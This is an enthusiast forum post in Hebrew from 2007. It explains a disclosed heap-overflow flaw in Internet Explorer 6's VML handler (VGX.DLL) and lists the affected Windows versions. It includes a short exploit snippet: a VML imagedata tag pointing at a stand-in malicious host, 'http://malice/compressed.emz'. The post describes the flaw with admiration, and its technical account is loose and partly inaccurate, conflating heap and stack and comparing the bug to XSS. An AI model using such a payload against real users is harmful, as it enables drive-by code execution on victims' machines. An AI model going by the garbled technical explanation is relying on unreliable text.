קיצור היה לי טיפה זמן היום..אז אמרתי לעצמי שצריך להתחיל להוזיז את הרמה פה עם מאמרים וזה
קיצור אני מקווה שזה אחד מתוך סידרה של מאמרים מעניינים בתיקווה שיהיה לי זמן תהנו..
פרצת אבטחה בדפדפן האינטרנט:explorer6
מערכות פגיעות:
ציטוט:Internet Explorer 6 SP1 - Windows 2000 SP4
Internet Explorer 6 SP1 - Windows XP SP1
Internet Explorer 6 SP2 - Windows XP SP2
Internet Explorer 6 SP1 - Windows Server 2003 SP1
Internet Explorer 6 SP2 - Windows Server 2003 SP2
מאמר:
חברת האבטחה eEye Digital Security גילתה לאחרונה פרצת אבטחה מסוג heapoverflow (הצפת ערמת מחסניות זיכרון)
ציטוט:הצפת ערמת מחסניות הינה פרצת אבטחה שמתרחשת בעת טיפול לא נכון של קבצים בכתיבה לערימת מחסניות זיכרון.
דבר שגורם לכתיבה מעבר למחסנית מסויימת ושפיכה של המידע למחסנית הבאה בערימת המחסניות
שנגרמת בעיקבות טיפול לא נכון של מערך הקבצים VGX.DLL’s
ויכול לגרום להצפה בערמת המחסניות שכמובן תאפשר הרצה של קוד זדוני במערכת הלקוח
או במילים פשוטות המשתמש שצופה באתר עם הקוד הזדוני המוסתר בו פגיע להרצת כל קוד זדוני יהיה אשר יהיה על המערכת שלו
פרטים טכניים
ישנו מערך קבצי dll באינטרנט אקספלורר בשם VGX.DLL’s
שיעודו בין הייתר לטפל במידע שמגיע מקובצי
vml (Vector Markup Language)1
הבעיה מתרחשת כאשר נשלח מידע מקווץ מקובץ ה- vml שדיברנו עליו
אל מערך הקבצים VGX
מה הבעיה? פשוט מאוד המערך לא מטפל נכון במידע שמגיע אליו בזהירות ולכן אם קובץ ה vml ישלח למערך הקבצים של vgx תמונה כביכול שבתוכה יש קישור לדף עם קוד זדוני מערך הקבצים יפעיל את הקוד הזדוני במקום להציג את התמונה.
נכון מאודדד (: זה מאוד דומה לxss שבו היינו משחילים קודים בתוך תמונות בפורמים וכדומה אבל הפרצה ההיא נגמרה
וזו לעומתה חדשה ובועטת חזקק
דוגמא לניצול הפירצה:
ציטוט:פשוט מאוד ניצור דף html רגיל ובתוכו נשחיל את הקוד
<v:rect>
<v:imagedata src="http://malice/compressed.emz">
</v:rect>
מה שעשינו זה ליצור תג שמפנה את הטיפול בשורות שבאות אחריו לקובץ ה-vml ועכשיו אמרנו לו שאנחנו רוצים להציג תמונה
אבל בכתובת התמונה למעשה הכנסנו קישור לדף זדוני בשם
compressed.emz
בדף הזה כל אחד יכול לכתוב איזה קוד זדוני שיעלה על רוחו
מה שיפה בפרצה הזאת שגם אם מישהו ישתול קוד לא נכון או יעשה איזה שגיאה כל שהיא זה גם יגרום לבעיה אחרת מסוג
denial of service (dos)1
קרדיט לחברת: eEye Digital Security
מאמר מקורי: כאן
נ.ב: חברת מיקרוסופט תיקנה את הבעיה באינטרנט אקספלורר7 על ידי שינוי הדרך שבה מערך הקבצים vgx מטפל בחומר שמגיע אילו מקווץ
שלכם תמיד An7iVi2uS[ההודעה נערכה על-ידי antivirus ב-21/08/2007 11:08:03]